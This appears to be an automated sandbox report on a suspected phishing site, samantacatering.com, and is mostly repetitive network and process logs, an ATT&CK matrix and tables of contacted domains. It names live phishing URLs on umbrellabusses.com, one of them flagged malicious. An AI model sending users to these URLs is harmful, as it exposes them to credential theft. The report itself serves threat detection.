Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
Source: unknownNetwork traffic detected: HTTP traffic on port 50144 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50144
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50146
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50145
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50148
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50103 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50176 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50152
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50145 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50174 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50139 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50175 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50099
Source: unknownNetwork traffic detected: HTTP traffic on port 50112 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50152 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50086 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50146 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50101 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
Source: classification engineClassification label: mal48.phis.win@17/195@34/15
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1980,i,699547893311511455,8046579587966195972,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://samantacatering.com/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1980,i,699547893311511455,8046579587966195972,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Registry Run Keys / Startup Folder
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://samantacatering.com/0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://umbrellabusses.com/samhentir/css/init.css?v=17365171720%Avira URL Cloudsafe
https://umbrellabusses.com/samhentir/img/good.png0%Avira URL Cloudsafe
https://umbrellabusses.com/samhentir/auth/0%Avira URL Cloudsafe
https://umbrellabusses.com/samhentir/css/main.css0%Avira URL Cloudsafe
https://www.samantacatering.com0%Avira URL Cloudsafe
https://umbrellabusses.com/samhentir/img/log.png0%Avira URL Cloudsafe
https://umbrellabusses.com/samhentir/img/flaretext.png0%Avira URL Cloudsafe
https://umbrellabusses.com/favicon.ico0%Avira URL Cloudsafe
https://umbrellabusses.com/samhentir/img/pf.png0%Avira URL Cloudsafe
https://umbrellabusses.com/samhentir/js/check.js?v=17365171720%Avira URL Cloudsafe
https://www.samantacatering.com/_api/v1/access-tokens0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
umbrellabusses.com
104.21.83.97
truetrue
    unknown
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      browser.sentry-cdn.com
      151.101.130.217
      truefalse
        high
        glb-editor.wix.com
        34.149.206.255
        truefalse
          high
          sentry-ssl-462500017.us-east-1.elb.amazonaws.com
          44.195.212.92
          truefalse
            high
            td-static-34-49-229-81.parastorage.com
            34.49.229.81
            truefalse
              high
              d1cq301dpr7fww.cloudfront.net
              99.86.4.125
              truefalse
                high
                www.google.com
                216.58.206.68
                truefalse
                  high
                  samantacatering.com
                  185.230.63.171
                  truefalse
                    unknown
                    td-ccm-neg-87-45.wixdns.net
                    34.149.87.45
                    truefalse
                      high
                      bi-flogger-alb-ext-343643057.us-east-1.elb.amazonaws.com
                      3.234.186.141
                      truefalse
                        high
                        static.wixstatic.com
                        unknown
                        unknownfalse
                          high
                          siteassets.parastorage.com
                          unknown
                          unknownfalse
                            high
                            sentry-next.wixpress.com
                            unknown
                            unknownfalse
                              high
                              frog.wix.com
                              unknown
                              unknownfalse
                                high
                                www.samantacatering.com
                                unknown
                                unknownfalse
                                  unknown
                                  panorama.wixapps.net
                                  unknown
                                  unknownfalse
                                    high
                                    static.parastorage.com
                                    unknown
                                    unknownfalse
                                      high
                                      NameMaliciousAntivirus DetectionReputation
                                      https://static.parastorage.com/unpkg/react@18.3.1/umd/react.production.min.jsfalse
                                        high
                                        https://static.parastorage.com/services/wix-thunderbolt/dist/browser-deprecation.bundle.es5.jsfalse
                                          high
                                          https://a.nel.cloudflare.com/report/v4?s=h%2BCxDTqcl9%2Bp1xH1t8iXLJONVqNNYhgZvv%2F%2FqBy4dfDikrLNjYBlHsEkALCauQSUchQFAL2B%2Fj35ai1J0OblAiseg9x5rGB6DnIptADkQpxJHw5CLhsGWjjF%2BAk5rXtzqqkW3kM%3Dfalse
                                            high
                                            https://static.parastorage.com/services/wix-thunderbolt/dist/group_0.774938b3.chunk.min.jsfalse
                                              high
                                              https://umbrellabusses.com/samhentir/img/good.pngfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://frog.wix.com/bt?src=29&evid=3&viewer_name=thunderbolt&caching=hit,hit_miss&dc=virginia-pub&microPop=fastly_virginia-pub_g&et=12&event_name=Partially%20visible&is_cached=true&is_platform_loaded=0&is_rollout=1&ism=1&isp=0&isjp=false&iss=1&ita=1&msid=8fc1138c-79b4-4e29-bbc0-d551c6ca71af&pn=1&sessionId=609f0441-2d8c-4646-846e-278b54a8f519&siterev=11-__siteCacheRevision__&st=2&ts=1892&tts=3434&url=https%3A%2F%2Fwww.samantacatering.com%2F&v=1.15031.0&vsi=4d6f889a-d75d-4216-a25e-a2eb4ad3a234&_brandId=wixfalse
                                                high
                                                https://static.parastorage.com/services/wix-thunderbolt/dist/renderer.1e49a6e4.chunk.min.jsfalse
                                                  high
                                                  https://samantacatering.com/false
                                                    unknown
                                                    https://static.parastorage.com/services/wix-thunderbolt/dist/group_24.8fa71ce8.chunk.min.jsfalse
                                                      high
                                                      https://static.parastorage.com/services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolt_bootstrap.d49fc07e.bundle.min.jsfalse
                                                        high
                                                        https://static.parastorage.com/services/wix-thunderbolt/dist/group_11.ffa65b2d.chunk.min.jsfalse
                                                          high
                                                          https://static.parastorage.com/services/wix-thunderbolt/dist/group_5.22f6e4ec.chunk.min.jsfalse
                                                            high
                                                            https://umbrellabusses.com/samhentir/img/flaretext.pngfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://static.parastorage.com/services/wix-thunderbolt/dist/onloadCompsBehaviors.a5af195f.chunk.min.jsfalse
                                                              high
                                                              https://umbrellabusses.com/samhentir/auth/?client_id=nh8u3iswi2jj7h2yyyiepds8uy7e2nepisuuojswwpyuhds2euyjfpihhieewiyhpiybnj8oieaeuuywfio8eujn2uih8dtitoupoiiw8ywoeiywiwyjh72edee8suawdu88tah7obyauys32heunbiepii7us8epwejw2jena7y8yn77nf3n82tjaa7wuop87swnauh8ia&key=256&id=295440true
                                                                unknown
                                                                https://frog.wix.com/bolt-performancefalse
                                                                  high
                                                                  https://static.parastorage.com/services/wix-thunderbolt/dist/scrollToAnchor.03bceb39.chunk.min.jsfalse
                                                                    high
                                                                    https://umbrellabusses.com/samhentir/css/init.css?v=1736517172false
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://static.parastorage.com/services/wix-thunderbolt/dist/group_2.484922c1.chunk.min.jsfalse
                                                                      high
                                                                      https://static.parastorage.com/services/wix-thunderbolt/dist/group_30.55a3b177.chunk.min.jsfalse
                                                                        high
                                                                        https://static.parastorage.com/services/wix-thunderbolt/dist/reporter-api.6946832d.chunk.min.jsfalse
                                                                          high
                                                                          https://static.parastorage.com/services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolt[StylableButton_Default].e479a096.bundle.min.jsfalse
                                                                            high
                                                                            https://umbrellabusses.com/samhentir/auth/false
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://static.parastorage.com/services/editor-elements/1.13190.0/rb_dsgnsys.thunderbolt.manifest.min.jsonfalse
                                                                              high
                                                                              https://umbrellabusses.com/favicon.icofalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://static.parastorage.com/services/wix-thunderbolt/dist/router.478f8b95.chunk.min.jsfalse
                                                                                high
                                                                                https://static.parastorage.com/services/wix-thunderbolt/dist/group_28.a74cf8a9.chunk.min.jsfalse
                                                                                  high
                                                                                  https://static.parastorage.com/services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolt[StripColumnsContainer_Default].51ef30fd.bundle.min.jsfalse
                                                                                    high
                                                                                    https://static.parastorage.com/services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolt[ClassicSection].17ff44ab.bundle.min.jsfalse
                                                                                      high
                                                                                      https://static.parastorage.com/services/wix-thunderbolt/dist/componentsLoader.8acadaf2.chunk.min.jsfalse
                                                                                        high
                                                                                        https://umbrellabusses.com/samhentir/false
                                                                                          unknown
                                                                                          https://static.parastorage.com/tag-bundler/api/v1/fonts-cache/googlefont/woff2/s/playfairdisplay/v18/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgEM86xQ.woff2false
                                                                                            high
                                                                                            https://www.samantacatering.com/false
                                                                                              unknown
                                                                                              https://umbrellabusses.com/samhentir/css/main.cssfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
